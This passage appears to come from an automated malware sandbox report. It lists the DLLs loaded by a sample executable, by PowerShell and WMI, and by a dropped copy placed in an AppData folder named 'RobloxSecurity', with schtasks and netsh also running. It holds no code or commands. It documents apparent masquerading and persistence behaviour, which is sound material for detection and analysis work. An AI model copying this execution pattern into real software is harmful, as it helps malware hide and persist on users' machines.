                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: httpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: httpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: amsi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
